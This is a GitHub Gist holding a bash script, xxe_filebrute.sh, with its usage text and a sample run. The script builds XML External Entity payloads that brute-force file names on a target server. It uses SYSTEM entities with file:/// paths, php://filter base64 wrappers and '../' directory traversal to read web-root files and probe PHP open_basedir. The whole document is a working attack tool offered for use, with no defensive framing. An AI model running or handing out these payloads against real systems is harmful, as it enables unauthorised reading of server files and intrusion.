Last active
August 29, 2015 14:14
-
-
Save themson/f6c91ac2d7bc7a374e2d to your computer and use it in GitHub Desktop.
Script for brute forcing file names via XML DTD Entities
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # script for brute forcing file names via XML DTD Entities | |
| PATH_BASE=$1 | |
| FILE_LIST=$2 | |
| i=1; | |
| CONCAT_ENT="" | |
| CONCAT_HEAD="<!ENTITY file_list \"" | |
| CONCAT_TAIL="\" >" | |
| # CONFIRM CLI ARGUMENT COUNT | |
| if [ "$#" -ne 2 ]; then | |
| >&2 echo -e "\nUSAGE: $0 <'single_quoted_path_base'> <file_names_list>\n"; | |
| >&2 echo -e "USAGE EXAMPLE: $0 'file:///c:/inetpub/wwwroot/' file_names.txt" | |
| >&2 echo -e "PATH EXAMPLES: PHP Filters - 'php://filter/convert.base64-encode/resource='" | |
| >&2 echo -e " Fingerprint PHP open_basedir - 'php://filter/convert.base64-encode/resource=../../../../../../../../../'" | |
| >&2 echo -e " File Stream - 'file:///'" | |
| >&2 echo -e " Empty Base - ''" | |
| >&2 echo -e "" | |
| exit | |
| fi | |
| # CONVERT FILE PATH TO ONLY BACKSLASHES | |
| PATH_BASE=$(echo $PATH_BASE | tr '\\' '\/') | |
| # CONFIRM FILE_LIST IS PRESENT | |
| if [ ! -f $FILE_LIST ]; then | |
| >&2 echo "ERROR: File ($FILE_LIST) not found!" | |
| exit | |
| fi | |
| declare -a FILE_NAMES | |
| readarray -t FILE_NAMES < $FILE_LIST | |
| INDEX_LAST=$(( ${#FILE_NAMES[*]} - 1 )) | |
| LAST_FILE=${FILE_NAMES[$INDEX_LAST]} | |
| # PRINT DOCTYPE HEADER | |
| echo -e "<!DOCTYPE file_brute [" | |
| # OUTPUT ENTITY LIST | |
| for FILE in "${FILE_NAMES[@]}"; do | |
| ENT_NAME="file_$i" | |
| echo \<\!ENTITY $ENT_NAME SYSTEM \"$PATH_BASE$FILE\" \> | |
| CONCAT_ENT="$CONCAT_ENT&$ENT_NAME;" | |
| let "i += 1" | |
| done | |
| # PRINT CONCATINATED ENTITY LIST | |
| printf "%s%s%s" "$CONCAT_HEAD" "$CONCAT_ENT" "$CONCAT_TAIL" | |
| # PRINT DOCTYPE TAIL | |
| echo -e "\n]>\n" | |
| echo "<files>&file_list;</files>" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
$ ./xxe_filebrute.sh
USAGE: ./xxe_filebrute.sh <'single_quoted_path_base'> <file_names_list>
USAGE EXAMPLE: ./xxe_filebrute.sh 'file:///c:/inetpub/wwwroot/' file_names.txt
PATH EXAMPLES: PHP Filters - 'php://filter/convert.base64-encode/resource='
Fingerprint PHP open_basedir - 'php://filter/convert.base64-encode/resource=../../../../../../../../../'
File Stream - 'file:///'
Empty Base - ''
$ ./xxe_filebrute.sh '' filelist.txt
]>
&file_list;